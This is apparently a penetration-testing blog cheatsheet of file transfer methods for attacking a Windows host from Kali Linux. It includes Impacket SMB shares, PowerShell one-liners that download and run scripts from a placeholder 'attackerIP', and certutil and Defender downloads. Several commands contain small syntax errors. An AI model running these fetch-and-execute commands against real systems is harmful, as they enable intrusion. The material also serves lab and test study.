Tips & Tricks

Windows File Transfer Cheatsheet

Wanted to provide a single place to go for all file upload/download techniques when attacking a Windows machine from Kali Linux. This will be updated as I come across new ones and/or the next time I need to use them.


Uploading and Hosting Files

Python Web Server

The following will start a webserver in the present working directory using Python2.
python -m SimpleHTTP Server 80

The following will start a webserver in the present working directory using Python3.
python3 -m http.server 80


Impacket SMB Server

You can download Impacket from Github.

We’ll need to perform a few steps to set this up, but it’s a great way to transfer files to/from a system. To begin, let’s create a directory called smb on our attacking system. Files in this directory will be available on the other end, and likewise, the other end will be able to place files into this directory.
mkdir smb
impacket-smbserver <sharename> `<path>`

Then we can mount this file share in PowerShell from the other side.
New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName>

And change into the new drive.
cd <ShareName>:

Additional Method With Authentication:

On our Kali machine, we’ll start our Impacket server while in the directory we wish to host.
sudo impacket-smbserver <shareName> $(pwd) -smb2support -user <user> -p <password>

Then on the Windows machine, we’ll connect back to this SMB share, but we’ll need to specify the credentials mentioned in the above command. To do that, we’ll use the following commands:

$pass = ConvertTo-SecureString '<password>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<user>', $pass)
New-PSDrive -Name "<ShareName>" -PSProvider "FileSystem" -Root "\\<attackerIP>\<ShareName> -Credential $cred


Downloading Files

PowerShell

The following will download and store a remote file to disk.
Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe"

The following will download and automatically execute the remote PowerShell script when ran from a command prompt.
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1')

An alternative to the above is to use Invoke-WebRequest in a different manner.
powershell.exe "IEX (IWR http://attackerIP/file.ps1 -UseBasicParsing)"


CertUtil

The following will download and store a remote file to disk.
certutil.exe -urlcache -f "http://attackerIP/file.exe" file.exe


Windows Defender

The following will download and store a remote file to disk.
MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]


Transferring with SSH

To copy a file from B to A while logged into B:
scp /path/to/file username@a:/path/to/destination

To copy a file from B to A while logged into A:
scp username@b:/path/to/file /path/to/destination


Transferring via Base64 Encoding

From within a PowerShell session, you may want to encode the file into Base64 format so you can just copy it down to your destination machine and decode it on the other side. This is handy for transferring small files.

Within PowerShell, you can encode a file by running:

$file-contents = Get-Content "filename.txt"
$file-encode = [System.Text.Encoding]::UTF8.GetBytes($file-contents)
[System.Convert]::ToBase64String($file-encode)

Then, within Kali, you can decode it using the following:
echo -n <base64String> | base64 -d > filename.txt

This should create the file for you to interact with.


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s